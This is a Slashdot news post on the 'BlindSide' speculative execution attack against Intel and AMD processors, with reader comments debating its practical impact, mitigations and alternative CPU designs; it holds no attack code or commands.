Security Researchers Detail New 'BlindSide' Speculative Execution Attack (phoronix.com) 33
"Security researchers from Amsterdam have publicly detailed 'BlindSide' as a new speculative execution attack vector for both Intel and AMD processors," reports Phoronix:
BlindSide is self-described as being able to "mount BROP-style attacks in the speculative execution domain to repeatedly probe and derandomize the kernel address space, craft arbitrary memory read gadgets, and enable reliable exploitation. This works even in face of strong randomization schemes, e.g., the recent FGKASLR or fine-grained schemes based on execute-only memory, and state-of-the-art mitigations against Spectre and other transient execution attacks."
From a single buffer overflow in the kernel, researchers claim three BlindSide exploits in being able to break KASLR (Kernel Address Space Layout Randomization), break arbitrary randomization schemes, and even break fine-grained randomization.
There's more information on the researcher's web site, and they've also created an informational video.
And here's a crucial excerpt from their paper shared by Slashdot reader Hmmmmmm: In addition to the Intel Whiskey Lake CPU in our evaluation, we confirmed similar results on Intel Xeon E3-1505M v5, XeonE3-1270 v6 and Core i9-9900K CPUs, based on the Skylake, KabyLake and Coffee Lake microarchitectures, respectively, as well as on AMD Ryzen 7 2700X and Ryzen 7 3700X CPUs, which are based on the Zen+ and Zen2 microarchitectures.
Overall, our results confirm speculative probing is effective on a modern Linux system on different microarchitectures, hardened with the latest mitigations.
From a single buffer overflow in the kernel, researchers claim three BlindSide exploits in being able to break KASLR (Kernel Address Space Layout Randomization), break arbitrary randomization schemes, and even break fine-grained randomization.
There's more information on the researcher's web site, and they've also created an informational video.
And here's a crucial excerpt from their paper shared by Slashdot reader Hmmmmmm: In addition to the Intel Whiskey Lake CPU in our evaluation, we confirmed similar results on Intel Xeon E3-1505M v5, XeonE3-1270 v6 and Core i9-9900K CPUs, based on the Skylake, KabyLake and Coffee Lake microarchitectures, respectively, as well as on AMD Ryzen 7 2700X and Ryzen 7 3700X CPUs, which are based on the Zen+ and Zen2 microarchitectures.
Overall, our results confirm speculative probing is effective on a modern Linux system on different microarchitectures, hardened with the latest mitigations.
Re: (Score:1, Funny)
BSD, no hyper-threading
Be smarter than that. (Score:3)
What makes you think any OS would be immune a flaw in the CPU?
Hardware flaws effect every OS.
Re: (Score:2)
What makes you think any OS would be immune a flaw in the CPU?
Hardware flaws effect every OS.
Hardware can be weak but the success of an attack relies on having something to attack. This is precisely why most speculative executions attacks are irrelevant since the OS randomises memory allocation and can also detect a complete exfiltration of data by analysing network patterns.
That's why I'm most curious about their mention of breaking ASLR since that's a very effective mitigation not against spec-excution attacks working on a machine, but rather against spec-execution attacks being useful to an atta
Re: (Score:2, Troll)
Shut up, Satya.
Negative speed gains (Score:2)
As processors get faster, the code necessary to mitigate the vulnerabilities added makes for (at best) a break-even net speed increase.
Re: Negative speed gains (Score:1)
Re: (Score:3)
The mitigations section of this paper isn't very cheerful about the impact of any code mitigations to this:
building on Spectre-BCB mitigations, we would add fence instructions behind all the conditional branches that are shortlyfollowed by indirect branch instructions. Unfortunately, our analysis shows these gadgets are pervasive and this strategy would severely limit the number of conditional branches that can benefit from speculation (and its performance gains).
Deterministic Time Execution (Score:2)
There really should be a mode (this would require hardware and kernel support) in which you can specify that a program always gets a time-slice that executes such and such many max clocks (i.e. clock cycles counted as if all speculative execution fails) and if speculative execution results in faster execution that just causes the OS to switch to anything process more quickly.
This wouldn't be trivial because you have to commit to only delivering any data at the start of time slices (or otherwise limit access
Re: (Score:2)
damn't the "anything process" was supposed to be "some other process"
A Bit Hard To Read (Score:3)
That paper is a bit hard to follow. Am I correct in understanding that the way it works is this. You set up some code which, on one path, loads a value from location SCANTARGET and then loads/jumps to a location ACONTROLLED if the value from SCANTARGET has some desired property. Now you prime the processor to predict that the the path above gets taken but actually ensure that the path isn't taken. As a result the speculative execution loads ACONTROLLED into the cache if SCANTARGET has the desired property but because the whole thing happens beneath a non-taken speculatively executed branch no error is reported?
Or am I missing something?
Re: (Score:2)
Re:It's broken Jim. (Score:5, Informative)
Basically, ASLR (etc) was invented to stop buffer overrun exploits. And it actually works pretty well, but a decade ago more-or-less researchers found a way to overcome it, but it required three different buffer overflows. These people claim to be able to take advantage with a single buffer overflow in the kernel, but what I understand is that it requires them to be able to run code on the machine.
So this is a privilege escalation exploit, not a remote exploit. And privilege escalation exploits are unfortunately common in Linux.
Dump pipelining, use logical cores (Score:3)
For servers (where things really matter because $$$) they should completely dump execution pipelining and with it, predictive branching. Instead of making one very fast CPU core, they should switch to having several logical cores for every physical core. The result would be a CPUs that run N logical cores at 1/Nth the fully pipelined speed. Having 64 logical cores running at 600MHz each instead of 8 cores running at 4.8GHz would be slow enough to prevent caches delays and maximize efficiency in parallel friendly loads.
Heavy load server software has already been adapted to utilize a thread on every core, so modern software wouldn't need adaptation. Probably not going to sell gamers on massively parallel processing but they aren't the cash cows that datacenters are anyway.
P.S. Yes this has already been done before. See also: XMOS XCore
Re: (Score:3)
That's where Sun was going at the end. It didn't really pan out. It turned out to be cheaper to just throw more big cores at the problem than to have all those lesser cores tied together.
Re: (Score:3)
Yes, software support is the key to success which is likely the issue Sun kept running into. Ensuring all major server software packages can utilize mass parallel computing is vital.
Re: (Score:3)
Well, we were doing it on SunOS 4 and 5 with DQS back in the day, I don't think that's the problem. I think the problem is that sort of thing is limiting. It's better to have multiple related tasks on a given core, and be able to go faster sometimes. Sure you're consuming more watts at lower power states than some more limited CPU that only goes that fast, but there's more there if you need it.
Re: (Score:2)
It's better to have multiple related tasks on a given core, and be able to go faster sometimes.
It's a matter of perspective. Sure, some businesses still buy their own servers but now with "cloud providers," the biggest buyers of chips don't give a shit about software design, so long as the money comes in and for lots of people, the transition would be a non-issue. Should the new paradigm prove to be more cost effective (e.g. lower overall power consumption) then "cloud providers" would markup the cost of the old x86 design. This would quickly cause many companies to modify their software to get th
Re: (Score:2)
That's fine for servers, but the problem is, OS providers are forcing the rest of us to pay to mitigate attacks we will never see.
Give us the option to ignore all this bullshit, please.
Re: (Score:1)
That's fine for servers, but the problem is, OS providers are forcing the rest of us to pay to mitigate attacks we will never see.
Give us the option to ignore all this bullshit, please.
I think you worked for my last employer. Either what you do is totally pointless or probably you just don't see the attacks that are actually happening. Most of this stuff gets rolled into viruses pretty quickly. Security is an arms race, not a fixed target.
Re: (Score:3)
Give us the option to ignore all this bullshit, please.
There are other options that are secure but you aren't willing to pay for them. https://www.raptorcs.com/TALOS... [raptorcs.com]
Re: (Score:2)
Wow, you weren't kidding, we're really not willing to pay for them. Seven grand for an entry workstation? Lolwaffles.
Add to that the fact that POWER was one of only two architectures fully vulnerable to MELTDOWN and it becomes really hilarious.
Re: (Score:2)
For servers (where things really matter because $$$) they should completely dump execution pipelining and with it, predictive branching.
You should propose that to Intel. They can come up with a fancy name for it, something that reflects how it's hardened against attacks. Like titanium. Except Intel... I know. Itanium! I'm sure a system which requires a paradigm shift in compilers will sell well.
Re: (Score:3)
"Premature optimization is the root of all evil". The quote is attributed to Donald Knuth, and this is an example of an "otimizatoin" which has bred entire industry of time wasted by trying to mitigate the resulting dangers and errors.
Re: (Score:2)
1. That the opposite of logical cores.
2. The leakage will kill you until you co-optimize a new process. The thing about an un-pipielined processor is that most of the time each part is not doing anything. This is the orignal reason for why pipelining is useful. If you're going to replicate all the units N times then you're going to pay N times the leakage even when they're not doing anything. For a typical microcontroller you deal with this by manufacturing in an ancient process with a relatively long-chann
Needs a buffer overflow in the kernel (Score:4, Insightful)
If there is a buffer overflow in the kernel, things are already dire. That they can also explore execute-only memory is nice, but mostly an academic concern at this time. Hence this seems like pretty cool research, but not very much of a practical consideration at the moment.
Itanium (Score:2)
Poor Itanium that everyone forgot about, that is not vulnerable of any of the CPU bugs since Spectre, is not vulnerable of this one either.
Why ? Because it does not do any speculative anything in hardware. It's a massively parallel pure RISC CPU that allows you to do all the speculative stuff in software, at compile time.
But this required smart programmers.
Which is why Itanium was sidelined and killed.
Now we bitch and moan of the bugs on the duct-taped and overclocked grand-grand-grand-child half clone of t